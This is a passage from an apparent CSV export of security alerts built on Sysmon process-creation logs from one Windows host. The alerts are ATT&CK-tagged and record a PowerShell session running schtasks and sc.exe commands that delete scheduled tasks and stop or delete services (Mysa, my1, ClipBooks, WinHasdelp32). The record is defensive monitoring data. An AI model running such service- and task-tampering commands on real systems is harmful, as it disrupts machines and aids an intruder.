Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.258",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:32.932 +ProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010fd9d2b00} +ProcessId: 2100 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Mysa /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:32.935094700Z"",""eventRecordID"":""3285"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:32.932\r\nProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010fd9d2b00}\r\nProcessId: 2100\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN Mysa /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:32.932"",""processGuid"":""{df9fc3d3-b3d4-5ecf-0000-0010fd9d2b00}"",""processId"":""2100"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN Mysa /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.235",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:32.893 +ProcessGuid: {df9fc3d3-b3d4-5ecf-0000-00101d9b2b00} +ProcessId: 1820 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN my1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN my1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:32.899473100Z"",""eventRecordID"":""3284"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:32.893\r\nProcessGuid: {df9fc3d3-b3d4-5ecf-0000-00101d9b2b00}\r\nProcessId: 1820\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN my1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:32.893"",""processGuid"":""{df9fc3d3-b3d4-5ecf-0000-00101d9b2b00}"",""processId"":""1820"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN my1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.214",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:32.868 +ProcessGuid: {df9fc3d3-b3d4-5ecf-0000-00103f9a2b00} +ProcessId: 4864 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete ClipBooks +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete ClipBooks",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:32.877552500Z"",""eventRecordID"":""3283"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:32.868\r\nProcessGuid: {df9fc3d3-b3d4-5ecf-0000-00103f9a2b00}\r\nProcessId: 4864\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete ClipBooks\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:32.868"",""processGuid"":""{df9fc3d3-b3d4-5ecf-0000-00103f9a2b00}"",""processId"":""4864"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete ClipBooks"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.202",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:32.843 +ProcessGuid: {df9fc3d3-b3d4-5ecf-0000-00102f992b00} +ProcessId: 8124 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop ClipBooks +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop ClipBooks",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:32.846668800Z"",""eventRecordID"":""3282"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:32.843\r\nProcessGuid: {df9fc3d3-b3d4-5ecf-0000-00102f992b00}\r\nProcessId: 8124\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop ClipBooks\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:32.843"",""processGuid"":""{df9fc3d3-b3d4-5ecf-0000-00102f992b00}"",""processId"":""8124"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop ClipBooks"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.127",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:32.796 +ProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010be952b00} +ProcessId: 300 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHasdelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:32.799268700Z"",""eventRecordID"":""3279"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:32.796\r\nProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010be952b00}\r\nProcessId: 300\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:32.796"",""processGuid"":""{df9fc3d3-b3d4-5ecf-0000-0010be952b00}"",""processId"":""300"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHasdelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.071",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:32.744 +ProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010af922b00} +ProcessId: 8076 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinHasdadelp32 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdadelp32",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:32.747171100Z"",""eventRecordID"":""3276"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:32.744\r\nProcessGuid: {df9fc3d3-b3d4-5ecf-0000-0010af922b00}\r\nProcessId: 8076\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinHasdadelp32\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:32.744"",""processGuid"":""{df9fc3d3-b3d4-5ecf-0000-0010af922b00}"",""processId"":""8076"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinHasdadelp32"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.052",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:32.717 +ProcessGuid: 